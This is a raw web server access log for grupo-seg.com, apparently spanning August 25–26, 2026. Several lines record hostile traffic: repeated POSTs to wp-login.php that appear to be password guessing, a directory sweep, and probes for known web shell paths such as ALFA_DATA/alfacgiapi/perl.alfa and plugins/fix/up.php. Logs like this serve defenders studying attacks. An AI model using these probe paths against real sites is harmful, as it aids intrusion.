46.151.182.40 - - [25/Aug/2026:23:03:27 +0200] "GET /wp-admin/install.php HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:27 +0200] "GET /wp HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:27 +0200] "GET /home HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:28 +0200] "GET /blog HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:28 +0200] "GET /tmp HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:29 +0200] "GET /new HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:29 +0200] "GET /dev HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:30 +0200] "GET /old HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:31 +0200] "GET /cms HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:31 +0200] "GET /newsite HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:32 +0200] "GET /portal HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:33 +0200] "GET /test HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:34 +0200] "GET /web HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:34 +0200] "GET /main HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:35 +0200] "GET /testing HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:36 +0200] "GET /site HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:37 +0200] "GET /backup HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:38 +0200] "GET /demo HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:39 +0200] "GET /home HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:40 +0200] "GET /tmp HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:41 +0200] "GET /dev HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:42 +0200] "GET /cms HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:43 +0200] "GET /portal HTTP/1.1" 301 162 "-" "-"
46.151.182.40 - - [25/Aug/2026:23:03:44 +0200] "GET /web HTTP/1.1" 301 162 "-" "-"
93.46.24.112 - - [25/Aug/2026:23:20:51 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
93.46.24.112 - - [25/Aug/2026:23:46:11 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
216.244.66.239 - - [25/Aug/2026:23:50:53 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.239 - - [25/Aug/2026:23:50:54 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
149.88.104.68 - - [25/Aug/2026:23:55:20 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
93.46.24.112 - - [26/Aug/2026:00:11:13 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
93.123.109.120 - - [26/Aug/2026:00:28:20 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
93.123.109.120 - - [26/Aug/2026:00:28:20 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
72.145.93.164 - - [26/Aug/2026:00:30:35 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.0 Safari/537.36"
72.145.93.164 - - [26/Aug/2026:00:30:56 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 9; itel A27) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.143 Mobile Safari/537.36"
185.242.3.94 - - [26/Aug/2026:00:31:18 +0200] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.242.3.94 - - [26/Aug/2026:00:31:18 +0200] "POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.242.3.94 - - [26/Aug/2026:00:31:18 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.242.3.94 - - [26/Aug/2026:00:31:18 +0200] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
185.242.3.94 - - [26/Aug/2026:00:31:18 +0200] "POST /wp-plain.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
185.242.3.94 - - [26/Aug/2026:00:31:18 +0200] "POST /alfacgiapi/perl.alfa HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
93.46.24.112 - - [26/Aug/2026:00:36:37 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
43.160.225.169 - - [26/Aug/2026:00:58:20 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
46.151.182.40 - - [26/Aug/2026:01:01:10 +0200] "GET /xmlrpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:01:01:30 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
27.115.124.101 - - [26/Aug/2026:01:08:28 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; CPH2185) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Mobile Safari/537.36"
93.46.24.112 - - [26/Aug/2026:01:26:15 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
106.75.66.162 - - [26/Aug/2026:01:38:35 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 9_1_1; Win64; x64) AppleWebKit/571.55 (KHTML, like Gecko) Chrome/87.0.369 Safari/537.36"
106.75.64.250 - - [26/Aug/2026:01:40:08 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.37 (KHTML, like Gecko) Chrome/76.0.1839 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:01:51:18 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
170.106.180.153 - - [26/Aug/2026:01:59:12 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
93.46.24.112 - - [26/Aug/2026:02:16:46 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
151.242.30.12 - - [26/Aug/2026:02:23:21 +0200] "GET /en/countries/argentina/&ved=2ahUKEwigmu7Lg72WAxXgERAIHVeNNr84ChAWegQIFRAB HTTP/1.1" 301 162 "http://grupo-seg.com/" "Mozilla/5.0 (Linux; Android 14; SM-S918B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36"
151.242.30.12 - - [26/Aug/2026:02:23:22 +0200] "GET /en/countries/argentina/%23:~:text%3DMore%2520than%252010%2520years%2520primarily,of%2520road%2520and%2520rail%2520infrastructure.&ved=2ahUKEwigmu7Lg72WAxXgERAIHVeNNr84ChDvuhB6BAgaEAI HTTP/1.1" 301 162 "http://grupo-seg.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
151.242.30.12 - - [26/Aug/2026:02:23:23 +0200] "GET /en/countries/argentina/&ved=2ahUKEwigmu7Lg72WAxXgERAIHVeNNr84ChAWegQIFRAB HTTP/1.1" 301 162 "http://grupo-seg.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
151.242.30.12 - - [26/Aug/2026:02:23:24 +0200] "GET /en/countries/argentina/%23:~:text%3DMore%2520than%252010%2520years%2520primarily,of%2520road%2520and%2520rail%2520infrastructure.&ved=2ahUKEwigmu7Lg72WAxXgERAIHVeNNr84ChDvuhB6BAgaEAI HTTP/1.1" 301 162 "http://grupo-seg.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1"
93.46.24.112 - - [26/Aug/2026:02:41:42 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
124.220.42.101 - - [26/Aug/2026:02:52:09 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
51.79.151.214 - - [26/Aug/2026:02:57:16 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; CPH2185) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Mobile Safari/537.36"
62.60.130.247 - - [26/Aug/2026:03:01:24 +0200] "GET /wp-login.php HTTP/1.1" 301 162 "https://www.bing.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
51.79.151.214 - - [26/Aug/2026:03:03:52 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; CPH2185) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Mobile Safari/537.36"
93.46.24.112 - - [26/Aug/2026:03:06:36 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
176.126.104.192 - - [26/Aug/2026:03:14:45 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36/Nutch-1.23-SNAPSHOT"
79.117.249.31 - - [26/Aug/2026:03:15:47 +0200] "GET / HTTP/1.1" 301 162 "-" "presupuestor-crm-enrich/1.0 (+https://presupuestor.com; contacto: miguelgutierrezbarquin@gmail.com)"
32.185.231.189 - - [26/Aug/2026:03:24:24 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:03:30:44 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
40.88.21.235 - - [26/Aug/2026:03:35:20 +0200] "GET / HTTP/1.1" 301 162 "-" "DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)"
156.245.205.34 - - [26/Aug/2026:03:36:39 +0200] "GET /1234.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"
93.46.24.112 - - [26/Aug/2026:03:54:38 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:04:18:50 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:04:52:50 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:04:52:50 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
216.244.66.239 - - [26/Aug/2026:05:02:13 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.239 - - [26/Aug/2026:05:02:13 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
207.180.230.76 - - [26/Aug/2026:05:03:32 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
207.180.230.76 - - [26/Aug/2026:05:03:35 +0200] "GET /careers HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
207.180.230.76 - - [26/Aug/2026:05:03:36 +0200] "GET /jobs HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
207.180.230.76 - - [26/Aug/2026:05:03:37 +0200] "GET /career HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
207.180.230.76 - - [26/Aug/2026:05:03:38 +0200] "GET /en/careers HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
207.180.230.76 - - [26/Aug/2026:05:03:39 +0200] "GET /about/careers HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
207.180.230.76 - - [26/Aug/2026:05:03:40 +0200] "GET /company/careers HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
207.180.230.76 - - [26/Aug/2026:05:03:42 +0200] "GET /join-us HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
207.180.230.76 - - [26/Aug/2026:05:03:43 +0200] "GET /karriere HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
207.180.230.76 - - [26/Aug/2026:05:03:44 +0200] "GET /de/karriere HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
207.180.230.76 - - [26/Aug/2026:05:03:45 +0200] "GET /stellenangebote HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
207.180.230.76 - - [26/Aug/2026:05:03:46 +0200] "GET /about-us/careers HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
136.243.220.209 - - [26/Aug/2026:05:11:04 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
93.46.24.112 - - [26/Aug/2026:05:35:39 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
49.51.233.46 - - [26/Aug/2026:05:59:54 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
93.46.24.112 - - [26/Aug/2026:06:00:16 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
103.131.71.190 - - [26/Aug/2026:06:08:54 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
93.46.24.112 - - [26/Aug/2026:06:24:43 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
43.166.128.86 - - [26/Aug/2026:06:48:07 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
93.46.24.112 - - [26/Aug/2026:06:49:35 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:07:14:16 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:07:38:32 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:08:02:51 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:08:27:26 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
141.98.11.224 - - [26/Aug/2026:08:35:46 +0200] "GET / HTTP/1.0" 301 162 "http://grupo-seg.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
103.131.71.50 - - [26/Aug/2026:08:43:31 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
172.238.172.176 - - [26/Aug/2026:08:50:45 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MALGJS; rv:11.0) like Gecko"
93.46.24.112 - - [26/Aug/2026:08:52:03 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
104.165.120.150 - - [26/Aug/2026:08:55:45 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
104.165.120.214 - - [26/Aug/2026:08:55:46 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
104.222.43.118 - - [26/Aug/2026:08:55:46 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
192.30.83.35 - - [26/Aug/2026:08:55:46 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
82.156.116.86 - - [26/Aug/2026:09:10:06 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
93.46.24.112 - - [26/Aug/2026:09:16:58 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
104.252.3.187 - - [26/Aug/2026:09:23:23 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
104.252.3.188 - - [26/Aug/2026:09:23:23 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
104.222.43.197 - - [26/Aug/2026:09:23:23 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
104.222.43.204 - - [26/Aug/2026:09:23:23 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
93.46.24.112 - - [26/Aug/2026:09:41:57 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
183.87.46.36 - - [26/Aug/2026:09:46:05 +0200] "GET /ip HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
124.243.184.101 - - [26/Aug/2026:09:46:06 +0200] "GET /ip HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
46.250.173.36 - - [26/Aug/2026:09:46:06 +0200] "GET /ip HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
93.46.24.112 - - [26/Aug/2026:10:06:39 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
49.51.183.75 - - [26/Aug/2026:10:26:37 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
93.46.24.112 - - [26/Aug/2026:10:31:43 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
45.148.10.74 - - [26/Aug/2026:10:43:52 +0200] "GET /wp-json/gravitysmtp/v1/tests/mock-data?page=gravitysmtp-settings HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; SecurityResearch/1.0; )"
93.46.24.112 - - [26/Aug/2026:10:56:55 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
216.244.66.239 - - [26/Aug/2026:10:59:08 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
119.28.89.249 - - [26/Aug/2026:11:17:11 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
93.46.24.112 - - [26/Aug/2026:11:31:39 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
